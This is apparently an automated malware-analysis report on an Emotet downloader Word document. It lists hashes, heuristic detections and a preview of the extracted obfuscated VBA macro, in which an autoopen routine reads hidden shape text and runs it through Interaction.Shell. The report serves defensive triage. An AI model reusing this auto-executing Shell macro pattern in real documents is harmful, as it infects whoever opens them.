Office (OLE) malware analysis — malicious · c3dc667db396e465

MALICIOUS

Office (OLE)

132.2 KB Created: 2018-12-11 16:43:00 Authoring application: Microsoft Office Word First seen: 2020-05-14

MD5: 441695a0342fb66f16546d309d32d08e SHA-1: c429a8fb4ba1fbc99ca5bbd500f36be1af967bbb SHA-256: c3dc667db396e465d77e005b1ac07c8bbf90590eeb899324151fdc5ca1636002

292 Risk Score

Heuristics 10

ClamAV: Doc.Downloader.Emotet-6780510-1 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Emotet-6780510-1
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Potential Shell call in VBA critical OLE_VBA_SHELL

Potential Shell call in VBA
Matched line in script
```
.Shell(fiuOmuVi, qHVGfkUWS), wYfdZPpjf)
```
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro
Matched line in script
```
Sub autoopen()
```
Suspicious cmd.exe invocation with execution flag high SC_STR_CMD

Suspicious cmd.exe invocation with execution flag
Reference to PowerShell high SC_STR_POWERSHELL

Reference to PowerShell
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	4847 bytes
SHA-256: `642af68338dd3b85054af97c2bf126db9d3172d404fa4ee5168d950fae71f323`
Detection ClamAV: No threats found Obfuscation or payload: likely 142 of 173 identifiers look randomly generated (e.g. 'JonkdJdribVqCcOiakdcAsLk') — consistent with name-mangling obfuscation.
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "OrRhjCEQYBWHER" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub autoopen() lFhWQUo End Sub Attribute VB_Name = "WuXAvEX" Function lFhWQUo() On Error Resume Next hTILiiEasCazojiHiBAzR = (265717628 + Round(sVmaBFmccElDdNJ) * 279658780 - mNSlYihCtNlziEPsM + (qvDCVFazuCjAuYKlM / Tan(WWUmFYHsBiuzVK))) wTvLksMLaoiWsSMnz = 292065055 WdrUBmCpEHqLwVj = (226359617 + Round(jaJvmAsXGsOGzWlEplH) * 84533675 - OuzFQNFirUfwVmNSKjdzwv + (ojFkEHJkbVoSjJpWnmpPXjJ / Tan(jYmiBdNpTALWLcAbhkDb))) UjJVNqMHfVFabAjUiiwH = 339112785 IbbrcwiDuUzhLSrGZjLwiY = (103593892 + Round(GwGChBqaiaFEsUOlpY) * 188876587 - rUwBWjomDYFjLG + (fscWtiXDlNnNEVaIJvOcl / Tan(FfBNDXFVVsljjt))) CjXURLnjSjRcPvoz = 198988965 GRLBrXaiQHilaOQu = (283288209 + Round(HlHZopvjEGqfPjHuM) * 100974446 - wTiczKlTzzdNrzY + (JDhdWGLTTrlszdfBA / Tan(swdIKOCVzjatzhqSzrflm))) IKJFZtWUUbMGFalBsSaBIis = 174499907 RCiStuzblwjpJDNONAQr = (129642150 + Round(IpfuikVjOuKjuiGLY) * 267006074 - uGsFrvuvrWRlwJAu + (mwLOGEkoiZJfIBbcdZKQjo / Tan(opdKwIOatnRYadzoCHQNVkQj))) qJSjpiFwzWYctojPzP = 285516615 rToNpUfEVbhidvtEhOsZ = (233346116 + Round(nIqMFazZFSmTsFBi) * 237568522 - RhoJzEoWmQQNzKz + (jfWdOFFvWOrJCnDCimHB / Tan(dJmXjoiIrVbWMZVIGr))) ctnkMfTwNOjLCvIC = 144366113 TwErSZVOhwvMrfbiCHWHjEm = (179487441 + Round(foDwCJjoiQSqBfZ) * 57100964 - llpHorhNFqiKLOLdlmlRPfn + (XNOInBbzzlSBlwrw / Tan(lwTAiSBGNPsnrfGwij))) cYaDOlKZwKrnupvdiTK = 296641512 CFOdfDPDGmXhJwpJumwB = (305713998 + Round(EdBGEhTZrKavzLqCJL) * 298580586 - QHaSzWSNddCLljAl + (ZzhkhvMHNAiTrclHiFz / Tan(jGiPFwNHOKQKFb))) MLcjLNLlVoulBREDbDirT = 111240274 zSpOvZBHGDKkLLEnYn = (155630660 + Round(DaKbZnQZVolCTcwjjQXRf) * 57483490 - zHuPrPwizBuRXHOoH + (blRSHRiNUDIPFEu / Tan(NTfYZKYGoAZLbbVb))) JDWwizdhiusZhvpWM = 301663205 BKshzowBKbIsnBjiXBHiXKH = (103515116 + Round(VOOXiaPjCOVoZFvqN) * 153372170 - JonkdJdribVqCcOiakdcAsLk + (LpzwMsJnIGihdlOFjkFhYT / Tan(KbUFkuwQcDwRTfuS))) LCuWkwzzPXRIGCNsinUrm = 167047239 Const qHVGfkUWS = 0 SpULqCFMdwhDvPftzoHm = (167557558 + Round(ojpCjWzuoaARzsKanBs) * 155512407 - QzGdpHZthhKGsAkWoTiNiH + (DiQmjXBGuBmXkiY / Tan(OZBHtqLHrZDziJJFJtDzYVq))) jaQEFdAnPYTojAMMTJ = 306855654 zLOQbAsWkrNmriWY = (233440611 + Round(TWihcAlEqZzsRE) * 164268138 - CLluTFOlHFirtzzm + (GDIiPiNfWKTZrZJNhfLmo / Tan(NHwaXWuLtbKLLAQfmdYP))) vvMQfVdLRmAsZpAhpLqkLRrO = 208735694 Set BYkrhO = OrRhjCEQYBWHER.Shapes(qVYIj + "tESslznR" + jPajCfCfM) CROTWlMjYfSIrAAUt = (52119434 + Round(trQqCpZDHAjjZiYkCawLPiD) * 174218891 - clpjAOGjvHYlbMiwhFjr + (saTQwtzwfPopLZDjUHmazdbz / Tan(aOSOhYTifjLVTBUJkPrkvPma))) MzwRzPwURXiihzqU = 48015641 nDTHuwzNnlpPJAUwwHEXf = (189752455 + Round(SdjVwYJdHkXWkYwYFdhdJEO) * 276182242 - luIIKACKLBdNbCpiH + (fldkawjzuwzjOPqFKiAVw / Tan(ULZWVKdbswBVjDlBTKZLG))) LcnOWVrKimluRSL = 23292253 jcPwqBVfMzdbmNwhwOdjJB = (61755534 + Round(tQvTwvmRorVomTwjaCnLO) * 20398826 - WDiHAiVdfTfDZGBiR + (MmusHvfQwGGOzVpB / Tan(QOnmiTOpVGPYaYUVwCQ))) iwmcklOWRVJOYjlUib = 193209678 ZjOmdmsPscwnAcudsT = (67697133 + Round(zJiZJzdFMIHUHYzshCzX) * 29499270 - zmjwYtwKzSHNTPwpciImCjUb + (bfBvpVnaCJvpNbkJBJpN / Tan(EiusZTORuQRIQwOuPJwUmRF))) APCYdAaiOkWwGD = 103922595 fiuOmuVi = BYkrhO.TextFrame.TextRange + PmzssI + Htdhw + srKRpou + ujZRnLt + dJMYTTYC + FkiUN + amVcjU + mQEEbbFz + PAZDqzZ + dQTYrtn + KMJwIijC + mmUoXwFD YvJuaRGFmtdMGdNYPrTS = (32776378 + Round(ntazUzDkrLNcMzTRw) * 9806046 - JdbOFkcdLvLhUYGI + (UdzICBBSzdQQEzsSH / Tan(oMiUNsUrpfdsEGpCzVDCHbZ))) GGLMGzSPNdSwmzQFnKMWoGZK = 179591521 UFtYrQHmmXAvtjquijAVij = (330654234 + Round(NzZXAFFJiAjbjSlwpYLL) * 153120000 - cPaPiBZuKlHPKsrklhRqQtCP + (PuCjFYmGRXJwlWDj / Tan(qvURHtGEndtjfjMLBSHXN))) MUItVhnzLOGfCH = 312604482 fZUIabwWilBRQrqzjYO = (173221070 + Round(WftSMYkijKNvZiXuuhYh) * 201443851 - TwdlPzIZjWjtJu + (qODNnwaoWqISCprqsBT / Tan(zobIlaJiqMfZdTDT))) TqEtIHuGjFkpfqspid = 13586502 HRuIRXvntcWKfcNAm = (52658082 + Round(WfspklARYaHroPYKNfrPhTR) * 111390502 - FaGpNiUYsjjPbKWRGXNm + (hvGSAVvsKCObLiLtcKsnS / Tan(iovlUUwawDitXfzWNMYjhdVn))) fLXiNVwSlMSXOAbuj = 41648165 SGftFzfPm = Array(FTHVoJ, wiijbmS, zwLzlwXK, Interaction _ _ _ _ _ _ _ _ .Shell(fiuOmuVi, qHVGfkUWS), wYfdZPpjf) HFRToOqFALDwlwTF = (224706231 + Round(ajjsnlQBFUFBoRFoXRWPnLi) * 324377194 - SpDfRwlXqzziOR + (CmJWAwWltwZBiSEPCmpU / Tan(NWnXTdzRHKIzqMBBIzEwDKjs))) DFlkusZzkpQVwjVZUllQCsG = 23349787 ZHERRTRWRiFaowWvoXQEj = (125718479 + Round(DDdWtTmkFhbrPLLfECVjRKk) * 304362306 - iEquuwwGMBOowXDiuAsNH + (kcrLBOmdsSilKPv / Tan(KldkDJzrHiSBWKrjibTOCj))) jTiIvFLMojEqHkWDbfzEXvl = 44604557 End Function

Open this report in the interactive analyzer, or submit your own file for analysis.